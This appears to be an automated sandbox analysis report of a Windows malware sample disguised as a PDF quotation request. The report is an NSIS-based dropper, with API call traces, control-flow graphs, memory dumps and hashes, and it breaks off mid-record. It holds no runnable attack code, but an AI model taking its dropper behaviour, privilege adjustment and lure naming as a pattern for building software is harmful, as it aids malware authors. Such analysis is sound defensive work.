                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                  • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 0040362B
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 0040363A
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 00403645
                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 00403651
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3586999533-2829748640
                                                                                                                                  • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                  • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                  • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                  • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 148 404eb3-404eba 144->148 151 404de4-404deb 145->151 152 404dd7-404dde 145->152 149 404c40-404c5d call 406077 SendMessageW * 2 146->149 150 404c3d 146->150 147->143 153 404c65-404c91 call 404119 * 2 147->153 154 404f2b-404f33 148->154 155 404ebc-404ec2 148->155 149->147 150->149 157 404e60-404e63 151->157 158 404ded-404df0 151->158 152->148 152->151 189 404c97-404c9d 153->189 190 404d5c-404d6f GetWindowLongW SetWindowLongW 153->190 164 404f35-404f3b SendMessageW 154->164 165 404f3d-404f44 154->165 161 405113-405125 call 404180 155->161 162 404ec8-404ed2 155->162 157->148 163 404e65-404e6f 157->163 167 404df2-404df9 158->167 168 404dfb-404e10 call 404a7e 158->168 162->161 170 404ed8-404ee7 SendMessageW 162->170 172 404e71-404e7d SendMessageW 163->172 173 404e7f-404e89 163->173 164->165 174 404f46-404f4d 165->174 175 404f78-404f7f 165->175 167->157 167->168 168->157 186 404e12-404e23 168->186 170->161 181 404eed-404efe SendMessageW 170->181 172->173 173->148 183 404e8b-404e95 173->183 184 404f56-404f5d 174->184 185 404f4f-404f50 ImageList_Destroy 174->185 179 4050d5-4050dc 175->179 180 404f85-404f91 call 4011ef 175->180 179->161 194 4050de-4050e5 179->194 207 404fa1-404fa4 180->207 208 404f93-404f96 180->208 192 404f00-404f06 181->192 193 404f08-404f0a 181->193 195 404ea6-404eb0 183->195 196 404e97-404ea4 183->196 187 404f66-404f72 184->187 188 404f5f-404f60 GlobalFree 184->188 185->184 186->157 197 404e25-404e27 186->197 187->175 188->187 198 404ca0-404ca7 189->198 202 404d75-404d79 190->202 192->193 200 404f0b-404f24 call 401299 SendMessageW 192->200 193->200 194->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 194->201 195->148 196->148 203 404e29-404e30 197->203 204 404e3a 197->204 205 404d3d-404d50 198->205 206 404cad-404cd5 198->206 200->154 201->161 210 404d93-404d9b call 40414e 202->210 211 404d7b-404d8e ShowWindow call 40414e 202->211 213 404e32-404e34 203->213 214 404e36-404e38 203->214 217 404e3d-404e59 call 40117d 204->217 205->198 221 404d56-404d5a 205->221 215 404cd7-404d0d SendMessageW 206->215 216 404d0f-404d11 206->216 222 404fe5-405009 call 4011ef 207->222 223 404fa6-404fbf call 4012e2 call 401299 207->223 218 404f98 208->218 219 404f99-404f9c call 404afe 208->219 210->137 211->161 213->217 214->217 215->205 228 404d13-404d22 SendMessageW 216->228 229 404d24-404d3a SendMessageW 216->229 217->157 218->219 219->207 221->190 221->202 236 4050ab-4050bf InvalidateRect 222->236 237 40500f 222->237 242 404fc1-404fc7 223->242 243 404fcf-404fde SendMessageW 223->243 228->205 229->205 236->179 240 4050c1-4050d0 call 404a51 call 404a39 236->240 241 405012-40501d 237->241 240->179 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->222 244->236 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                  • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                  • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                  • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4227406936-0
                                                                                                                                  • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                  • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                  • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                  • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 707 4060c4-4060cb 703->707 705 4060d0-4060dd 704->705 706 4062cf-4062da 704->706 705->706 710 4060e3-4060ef 705->710 708 4062e5-4062e6 706->708 709 4062dc-4062e0 call 406055 706->709 707->704 709->708 712 4062b0 710->712 713 4060f5-406131 710->713 714 4062b2-4062bc 712->714 715 4062be-4062c1 712->715 716 406251-406255 713->716 717 406137-406142 GetVersion 713->717 714->704 715->704 718 406257-40625b 716->718 719 40628a-40628e 716->719 720 406144-406148 717->720 721 40615c 717->721 722 40626b-406278 call 406055 718->722 723 40625d-406269 call 405f9c 718->723 725 406290-406298 call 406077 719->725 726 40629d-4062ae lstrlenW 719->726 720->721 727 40614a-40614e 720->727 724 406163-40616a 721->724 738 40627d-406286 722->738 723->738 730 40616c-40616e 724->730 731 40616f-406171 724->731 725->726 726->704 727->721 728 406150-406154 727->728 728->721 734 406156-40615a 728->734 730->731 736 406173-406199 call 405f22 731->736 737 4061ad-4061b0 731->737 734->724 748 406238-40623c 736->748 749 40619f-4061a8 call 406077 736->749 741 4061c0-4061c3 737->741 742 4061b2-4061be GetSystemDirectoryW 737->742 738->726 740 406288 738->740 744 406249-40624f call 4062e9 740->744 746 4061c5-4061d3 GetWindowsDirectoryW 741->746 747 40622e-406230 741->747 745 406232-406236 742->745 744->726 745->744 745->748 746->747 747->745 750 4061d5-4061df 747->750 748->744 755 40623e-406244 lstrcatW 748->755 749->745 752 4061e1-4061e4 750->752 753 4061f9-40620f SHGetSpecialFolderLocation 750->753 752->753 757 4061e6-4061ed 752->757 758 406211-406228 SHGetPathFromIDListW CoTaskMemFree 753->758 759 40622a 753->759 755->744 761 4061f5-4061f7 757->761 758->745 758->759 759->747 761->745 761->753
                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 900638850-1230650788
                                                                                                                                  • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                  • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                  • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                  • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 777 4058b1-4058bc lstrcatW 769->777 778 4058be-4058bf call 405a55 769->778 770->767 774 4059b7-4059ba 770->774 771->769 771->770 775 4059c4-4059cc call 406398 774->775 776 4059bc-4059c2 774->776 775->767 786 4059ce-4059e2 call 405a09 call 4057fe 775->786 776->767 780 4058c4-4058c8 777->780 778->780 782 4058d4-4058da lstrcatW 780->782 783 4058ca-4058d2 780->783 785 4058df-4058fb lstrlenW FindFirstFileW 782->785 783->782 783->785 787 405901-405909 785->787 788 4059a5-4059a9 785->788 802 4059e4-4059e7 786->802 803 4059fa-4059fd call 4051b4 786->803 790 405929-40593d call 406055 787->790 791 40590b-405913 787->791 788->770 793 4059ab 788->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->787 801 40599e-40599f FindClose 795->801 798->790 798->795 801->788 802->776 807 4059e9-4059f8 call 4051b4 call 405ef6 802->807 803->767 813 405980-405983 call 4051b4 804->813 814 405961-405964 804->814 805->795 808 405949-405952 call 405846 805->808 807->767 808->795 813->795 817 405966-405976 call 4051b4 call 405ef6 814->817 818 405978-40597e 814->818 817->795 818->795
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 0040586F
                                                                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058B7
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058DA
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058E0
                                                                                                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058F0
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                  Strings
                                                                                                                                  • \*.*, xrefs: 004058B1
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                                  • "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe", xrefs: 0040584F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                  • API String ID: 2035342205-2172775768
                                                                                                                                  • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                  • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                  • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                  • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00402154
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                  • API String ID: 542301482-2989991106
                                                                                                                                  • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
